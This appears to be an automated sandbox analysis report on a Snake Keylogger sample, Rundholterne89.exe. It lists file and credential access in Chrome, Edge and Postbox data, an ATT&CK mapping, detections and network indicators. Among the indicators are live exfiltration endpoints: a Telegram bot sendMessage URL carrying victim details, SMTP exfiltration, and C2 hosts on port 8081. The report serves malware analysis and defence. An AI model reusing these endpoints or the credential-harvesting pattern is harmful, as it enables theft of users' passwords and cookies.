          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6624, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6624, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6624, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          PowerShell
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Software Packing
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection
          1
          DLL Side-Loading
          Security Account Manager111
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          1
          Non-Standard Port
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
          Virtualization/Sandbox Evasion
          LSA Secrets31
          Virtualization/Sandbox Evasion
          SSHKeylogging3
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input Capture24
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539382 Sample: Rundholterne89.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 5 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Antivirus detection for dropped file 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 54 6 other signatures 2->54 8 Rundholterne89.exe 34 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\...xungulate.Spe205, ASCII 8->22 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 27 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\Rundholterne89.exe, PE32 12->24 dropped 26 C:\...\Rundholterne89.exe:Zone.Identifier, ASCII 12->26 dropped 58 Early bird code injection technique detected 12->58 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 3 other signatures 12->64 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 49728 TELEGRAMRU United Kingdom 16->28 30 smtp.ionos.es 213.165.67.118, 49729, 587 ONEANDONE-ASBrauerstrasse48DE Germany 16->30 32 4 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Rundholterne89.exe42%ReversingLabsWin32.Spyware.Snakekeylogger
          Rundholterne89.exe100%AviraTR/AVI.Inj.npwdo
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe100%AviraTR/AVI.Inj.npwdo
          C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe42%ReversingLabsWin32.Spyware.Snakekeylogger
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          http://checkip.dyndns.org0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://reallyfreegeoip.org0%URL Reputationsafe
          https://apis.google.com0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          142.250.185.174
          truefalse
            unknown
            drive.usercontent.google.com
            142.250.186.65
            truefalse
              unknown
              reallyfreegeoip.org
              188.114.97.3
              truetrue
                unknown
                smtp.ionos.es
                213.165.67.118
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/173.254.250.76false
                          unknown
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/173.254.250.76$msiexec.exe, 00000006.00000002.2625379700.0000000023287000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://www.office.com/msiexec.exe, 00000006.00000002.2625379700.00000000233FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20amsiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://duckduckgo.com/ac/?q=msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgmsiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://api.telegram.org/botmsiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://contoso.com/Licensepowershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.office.com/lBmsiexec.exe, 00000006.00000002.2625379700.00000000233FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://drive.usercontent.google.com/msiexec.exe, 00000006.00000002.2603668887.00000000006AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://nsis.sf.net/NSIS_ErrorErrorRundholterne89.exe, Rundholterne89.exe.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://smtp.ionos.esmsiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.2625379700.00000000233CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.ecosia.org/newtab/msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.google.commsiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://nsis.sf.net/NSIS_ErrorRundholterne89.exe, Rundholterne89.exe.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://drive.google.com/msiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://contoso.com/powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000006.00000002.2625379700.00000000233C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://drive.google.com/lmsiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://apis.google.commsiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUtrue
                                                                      142.250.185.174
                                                                      drive.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      188.114.97.3
                                                                      reallyfreegeoip.orgEuropean Union
                                                                      13335CLOUDFLARENETUStrue
                                                                      193.122.130.0
                                                                      checkip.dyndns.comUnited States
                                                                      31898ORACLE-BMC-31898USfalse
                                                                      213.165.67.118
                                                                      smtp.ionos.esGermany
                                                                      8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                      142.250.186.65
                                                                      drive.usercontent.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1539382
                                                                      Start date and time:2024-10-22 16:02:09 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 46s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:11
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Rundholterne89.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@6/14@6/6
                                                                      EGA Information:
                                                                      • Successful, ratio: 66.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 97%
                                                                      • Number of executed functions: 136
                                                                      • Number of non-executed functions: 41
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: Rundholterne89.exe
                                                                      TimeTypeDescription
                                                                      10:03:14API Interceptor35x Sleep call for process: powershell.exe modified
                                                                      10:04:19API Interceptor15098x Sleep call for process: msiexec.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.220SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          188.114.97.3Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                          • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                                                          request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                          • www.ergeneescortg.xyz/guou/
                                                                                          Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.thetahostthe.top/9r5x/
                                                                                          http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                          • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                          SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                          SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                          ZP4KZDHVHWZZ2DC13DMX.exeGet hashmaliciousAmadeyBrowse
                                                                                          • tipinfodownload-soft1.com/g9jvjfd73/index.php
                                                                                          aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                                          • main.dsn.ovh/dns/loadbit
                                                                                          PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.freedietbuilder.online/nnla/
